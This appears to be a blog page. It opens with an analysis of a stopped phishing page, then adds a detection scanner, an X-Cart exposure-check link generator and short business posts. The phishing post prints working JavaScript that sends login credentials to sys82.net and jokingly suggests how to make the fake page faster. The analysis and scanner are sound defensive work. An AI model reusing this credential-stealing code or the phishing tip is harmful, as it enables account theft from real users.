Nifty Phishing Approach

*** Scam was stopped ***

This phishing attempt was delivered by email with the link shown above, claiming that maintenance was scheduled. The message has some nice text and never tells you to log in, but it helpfully provides a link so you can. :)

It looks great.

The code below is the phishing code. It runs when the login form is submitted: it reads the login and password fields, appends them to a URL on sys82.net as query-string parameters, and loads that URL as a script element, so the credentials reach the attacker's server as an ordinary GET request (and land in its access log). A script load is not restricted by the same-origin policy, which is why this works from any host. The trailing return false cancels the real submission, so the form never reaches the genuine site.


// Submit handler for the copied login form (the wrapper function is inferred from the trailing return false)
function sendLogin() {
var script = document.createElement('script');  // script load: no same-origin restriction
script.type = 'text/javascript';
// Credentials travel in the query string of a GET request to the attacker's host
script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
document.body.appendChild(script);  // appending the element fires the request
return false;                       // cancel the real submission
}

The page content was probably copied live from the real site, with the JavaScript added by the phishermen.

The page is slow. It would be better to take a screenshot and use that as a background while the real page loads. :yes:
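If you have a saved copy of a page like this one, the pattern is easy to spot mechanically: a statement that reads form-field values and glues them onto an absolute URL for a host the page does not belong to. The scanner below is an added example, not code from the original post. It walks the inline scripts of a page and flags such statements. The HTML sample and the host name secure.example-bank.test are constructed for the demonstration; the script embedded in the sample is the one from the post.

```javascript
// Added example (not code from the original post): a heuristic scanner for the
// credential-exfiltration pattern in the snippet above. It walks the inline
// scripts of a saved page and flags any statement that combines form-field
// values with an absolute URL on a host other than the page's own.
// SAMPLE_HTML and SAMPLE_PAGE_HOST are constructed for the demonstration.

const SAMPLE_PAGE_HOST = 'secure.example-bank.test'; // assumed: host the copied page pretends to be

const SAMPLE_HTML = `
<html><body>
<form onsubmit="return sendLogin()">
  <input id="loginid" name="loginid">
  <input id="password" name="password" type="password">
</form>
<script type="text/javascript">
function sendLogin() {
  var script = document.createElement('script');
  script.type = 'text/javascript';
  script.src = 'http://sys82.net/index.php?loh=1&login=' + document.getElementById('loginid').value + '&password=' + document.getElementById('password').value;
  document.body.appendChild(script);
  return false;
}
</script>
<script src="/static/app.js"></script>
</body></html>`;

// Return the bodies of inline <script> blocks. External scripts (src="...")
// have no inline body, so they are not examined here.
function extractInlineScripts(html) {
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const bodies = [];
  let m;
  while ((m = re.exec(html)) !== null) {
    if (m[1].trim()) bodies.push(m[1]);
  }
  return bodies;
}

// Split the script into rough statements on ';' (a heuristic, not a parser) and
// keep those that read a form field's .value and also mention an absolute
// http(s) URL. Each URL found in such a statement becomes one finding.
function findExfilStatements(js, pageHost) {
  const findings = [];
  for (const stmt of js.split(';')) {
    const fields = [...stmt.matchAll(/getElementById\(\s*['"]([^'"]+)['"]\s*\)\.value/g)].map(m => m[1]);
    const urls = [...stmt.matchAll(/['"](https?:\/\/[^'"]+)['"]/g)].map(m => m[1]);
    if (fields.length === 0 || urls.length === 0) continue;
    for (const u of urls) {
      const host = new URL(u).hostname;
      findings.push({ host, external: host !== pageHost, fields, statement: stmt.trim() });
    }
  }
  return findings;
}

// Scan a whole page; a finding with external === true is the credential leak.
function scanPage(html, pageHost) {
  return extractInlineScripts(html).flatMap(js => findExfilStatements(js, pageHost));
}

// Stand-alone run: print the findings for the constructed sample.
if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanPage(SAMPLE_HTML, SAMPLE_PAGE_HOST)) {
    console.log(`${f.external ? 'EXTERNAL' : 'same-host'} ${f.host} <- fields ${f.fields.join(', ')}`);
  }
}
```

Run it with node and it reports one external finding for sys82.net carrying the loginid and password fields. The statement split is deliberately crude; a real triage tool would use a JavaScript parser, but even this catches the straightforward concatenation the phishermen used here.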

Anonymous Contact Forms

There are times when an anonymous report is appropriate, usually when you are reporting something and do not need to be involved further.

In that case, filling in the contact form with bogus details and an email address at anonymous.com or example.com should pass validation and still deliver the message. (example.com is reserved for documentation and is never assigned as a real mail domain, so a reply can never reach a real person there.)

I don’t think email validation should discard anonymous reports unless they are attempts to spam.

http://anonymous.com/
http://www.example.com/

Free X-Cart Installation Checker

The checker is a single HTML file. You enter the URL of your cart and the directory it is installed in, and it builds a set of links you can click to see whether the server has been configured to block direct access to the files that should be protected.

This tool is valuable for the following:

  • Engineering, security, and QA - to ensure the application was properly installed and protected
  • eCommerce site owners - to check the work of your web development company
  • Credit card gateway companies - to check the security of the application installed for requesting clients
  • Security - to identify risk areas for applications
  • Hosting companies - to check client accounts after security problems

You do not have to install it on a server; you can run it from the desktop. It needs no server access beyond a browser: no passwords, no database access, no FTP, no SSH. It doesn’t use AJAX, it won’t log into your cart, and it won’t analyze the results.

It is a very simple, free tool that runs under IE.
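To show the mechanics of such a tool, here is an added example that is not the checker described above and is not X-Cart code. It takes a cart URL and an install directory, normalises them into one base URL, and emits plain click-to-check links, which is all a static, no-AJAX HTML page can do. The list of paths is an illustrative guess at files a PHP shop install should not serve directly; the real checker's list is not published on this page.

```javascript
// Added example (not the checker described on this page, not X-Cart code): a
// generator for "click to check" links. PROTECTED_PATHS is illustrative; the
// real checker's list is not published.
const PROTECTED_PATHS = [
  'config.php',    // assumed: configuration holding database credentials
  'install.php',   // assumed: installer that should be removed after setup
  '.htaccess',     // assumed: web server rules file
  'var/log/',      // assumed: log directory
];

// Join the cart URL and install directory into one base URL, tolerating
// missing or doubled slashes, dropping any query string, and rejecting
// directories that try to climb out of the site with "." or "..".
function baseUrl(cartUrl, installDir) {
  const dir = installDir.split('/').filter(Boolean);
  if (dir.some(p => p === '..' || p === '.')) {
    throw new Error('install directory must not contain . or .. segments');
  }
  const url = new URL(cartUrl);
  const basePath = url.pathname.split('/').filter(Boolean);
  const segments = basePath.concat(dir);
  url.pathname = '/' + segments.join('/') + (segments.length ? '/' : '');
  url.search = '';
  url.hash = '';
  return url.toString();
}

// One absolute URL per protected path, resolved against the base.
function buildCheckUrls(cartUrl, installDir, paths = PROTECTED_PATHS) {
  const base = baseUrl(cartUrl, installDir);
  return paths.map(p => new URL(p, base).toString());
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Render the checklist as static HTML: plain links, no script. The user's
// browser makes the request and the user judges the response.
function renderChecklist(urls) {
  const items = urls.map(u => `<li><a href="${escapeHtml(u)}" target="_blank" rel="noopener">${escapeHtml(u)}</a></li>`);
  return `<ul>\n${items.join('\n')}\n</ul>`;
}

// Stand-alone run on a constructed cart URL and install directory.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderChecklist(buildCheckUrls('https://shop.example.com', '/store/')));
}
```

Reading the results still needs a human: a 403 or 404 means the server refused to serve the file, while a 200 that shows contents means it is exposed. Note that a 200 on a .php file usually means the server executed it rather than leaked its source, so the interesting exposures are the files the server will hand over as-is, such as backups, logs and .htaccess.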

If you would like a copy, you must either have a live cart running, or be part of a web development company. Use an email with the domain name of the cart, or your web dev company, and I will send you the HTML - in a text file. Requests can be made through the contact form on this blog.

Please don’t use gmail, hotmail, yahoo or other free accounts. You will not receive any response.

The reason the page isn’t posted for public access is that it would make it very easy for people to quickly check a cart’s vulnerabilities. Limiting the distribution is for security. This is not an attempt to collect email addresses or domains that are running X-Cart. I know how to find carts. :)

Work isn't necessarily Profit

Never forget that even if you are working hard, if it costs more to deliver the goods or services than you receive, you are still losing money.

If you don’t know what it costs, you are probably losing money.

If you don’t know how much you have been paid, you are probably losing money.

If you don’t know the basic operating costs and overhead for your company, you are probably losing money.

Partnerships

  • A partnership doesn’t imply direct revenue generation or sales support
  • A partnership should help all parties reach their goals
  • A partnership should raise the level of service for the end user
  • A partnership should be respected by all parties
  • Partnership participation costs should be clearly defined and understood by all parties
  • Levels of participation should be allowed, and partners should be able to ‘opt-out’ of opportunities